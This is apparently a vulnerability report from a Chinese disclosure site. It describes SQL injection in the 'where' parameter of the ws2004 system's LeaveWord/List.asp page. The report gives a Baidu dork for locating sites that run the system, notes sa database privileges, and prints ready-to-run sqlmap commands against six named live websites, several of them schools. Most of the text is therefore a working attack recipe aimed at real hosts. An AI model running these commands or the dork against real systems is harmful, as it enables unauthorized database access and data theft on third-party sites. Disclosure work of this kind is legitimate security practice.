### 简要描述:
...
### 详细说明:
百度dork:inurl:/ws2004/
技术支持:南京苏亚星资讯科技开发有限公司
----------------------------------------
漏洞页面:ws2004/SysManage/LeaveWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111
漏洞参数:where
均为sa权限
----------------------------------------
漏洞证明:
1# http://www.suyaxing.com:81/ws2004/
```
C:\Users\Administrator>sqlmap.py -u "http://www.suyaxing.com:81/ws2004/SysManage/LeaveWord
/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current-
user
```
[<img src="https://images.seebug.org/upload/201501/062145230b740b54cb24410a2b6406a5eddf09a0.jpg" alt="QQ图片20150106214435.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/062145230b740b54cb24410a2b6406a5eddf09a0.jpg)
2# http://sgtjb.com/ws2004/
```
C:\Users\Administrator>sqlmap.py -u "http://sgtjb.com/ws2004/SysManage/LeaveWord
/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --current-
user
```
[<img src="https://images.seebug.org/upload/201501/06214639df8be08c8568be30d7c4d8019f1e14a2.jpg" alt="QQ图片20150106214632.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06214639df8be08c8568be30d7c4d8019f1e14a2.jpg)
3# http://www.sdjnzx.com/ws2004/
```
C:\Users\Administrator>sqlmap.py -u "http://www.sdjnzx.com/ws2004/SysManage/Leav
eWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --cu
rrent-user
```
[<img src="https://images.seebug.org/upload/201501/06214741fb7770c81e8e2f1767e6d8afad6e174e.jpg" alt="QQ图片20150106214734.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06214741fb7770c81e8e2f1767e6d8afad6e174e.jpg)
4# http://www.wuai.lwedu.sh.cn/ws2004/
```
C:\Users\Administrator>sqlmap.py -u "http://www.wuai.lwedu.sh.cn/ws2004/SysManag
e/LeaveWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db
--current-user
```
[<img src="https://images.seebug.org/upload/201501/06214847f54beceaa3b9aa778274d493d0f78bea.jpg" alt="QQ图片20150106214840.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06214847f54beceaa3b9aa778274d493d0f78bea.jpg)
5# http://www.yzsx.net.cn/ws2004/
```
C:\Users\Administrator>sqlmap.py -u "http://www.yzsx.net.cn/ws2004/SysManage/Lea
veWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-user --
current-db
```
[<img src="https://images.seebug.org/upload/201501/06215039df6dd7132bdadaf01b6ddd12de5941c1.jpg" alt="QQ图片20150106215032.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06215039df6dd7132bdadaf01b6ddd12de5941c1.jpg)
6# http://www.cgyz.net.cn//ws2004/
```
C:\Users\Administrator>sqlmap.py -u "http://www.cgyz.net.cn//ws2004/SysManage/Le
aveWord/List.asp?AbPage=1&where=%20where%20Title%20like%20111*" --current-db --c
urrent-user
```
[<img src="https://images.seebug.org/upload/201501/06215157dba042801217453fb257576f8d2a9c48.jpg" alt="QQ图片20150106215151.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06215157dba042801217453fb257576f8d2a9c48.jpg)
### 漏洞证明:
京公网安备 11010502034610号
暂无评论